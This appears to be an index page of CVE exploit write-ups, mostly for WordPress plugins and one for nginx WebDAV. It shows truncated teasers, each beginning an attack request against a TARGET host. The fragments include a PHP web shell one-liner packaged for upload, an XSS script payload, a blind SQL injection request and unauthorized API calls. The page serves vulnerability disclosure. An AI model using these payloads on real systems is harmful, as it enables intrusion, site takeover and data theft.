Articles

§06 · Field notes

CVE · PLUGINS · ZERO-DAYS
GitHub

CVE-2026-27654: nginx-dav-cve-2026-27654

## The Exploit Requires only network access to a DAV-enabled aliased prefix location; no privileged credentials are needed if the `MOVE`/`COPY` endpoint is exposed. ```bash curl -i -s -X MOVE 'http://TARGET/webdav/secret.txt' \ -H 'Host: TARGET' \ -H 'Destination: http://TA...

GitHub

CVE-2025-12957

## The Exploit Requires authenticated author-level access to the plugin’s AJAX import endpoint. ```bash printf '<?php system($_GET["cmd"]); ?>' > shell.php.vtt zip exploit.zip shell.php.vtt curl -i -s -k -X POST 'https://TARGET/wp-admin/...

Read article →
GitHub

CVE-2025-12166

## The Exploit Unauthenticated attackers can abuse the plugin's public query endpoint by sending a specially crafted `order` payload to force a blind SQL injection. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET Content-Type:...

Read article →
GitHub

CVE-2025-14001

## The Exploit An authenticated attacker with Contributor-level access can invoke the plugin’s bulk duplicate action directly and clone arbitrary posts/pages. ```bash curl -i -sS -X POST "https://TARGET/wp-admin/edit.php?post_type=page" \...

Read article →
GitHub

CVE-2025-14574

## The Exploit An unauthenticated attacker can read the plugin settings JSON directly. ```bash curl -i -H "Accept: application/json" \ http://target.example/wp-json/wp/v2/docs/settings ``` The request returns HTTP 200 and a JSON body c...

Read article →
GitHub

CVE-2025-14718

## The Exploit An authenticated Contributor can hit PublishPress Future’s REST workflow API without the workflow-specific nonce or a strong permission check. ```bash curl -i -X POST 'https://TARGET/wp-json/publishpress-future/v1/workflows...

Read article →
GitHub

CVE-2025-15055

## The Exploit Unauthenticated attacker. ```bash curl -i -s -X POST "https://TARGET/wp-admin/admin.php?page=wp-slimstat-reports" \ -H "Content-Type: application/x-www-form-urlencoded" \ --data-raw "notes=<script>alert('CVE-2025-15055'...

Read article →
GitHub

CVE-2025-13628

## The Exploit Authenticated subscriber-level users can abuse Tutor LMS coupon management endpoints without needing administrator privileges. ```bash curl -s -X POST 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Cookie: wordpress_logge...

Read article →
GitHub

CVE-2026-0563

## The Exploit Attacker needs authenticated contributor-or-above access to WordPress. ```bash curl -k -X POST "https://TARGET/wp-admin/post.php?post=123&action=edit" \ -H "Cookie: wordpress_logged_in_<hash>=<session_cookie>" \ -H "Con...

Read article →
GitHub

CVE-2025-13934

## The Exploit A subscriber-level authenticated user can enroll themselves in any paid course by invoking the Tutor LMS AJAX handler directly. ```bash curl 'https://TARGET/wp-admin/admin-ajax.php' \ -H 'Content-Type: application/x-www-f...

Read article →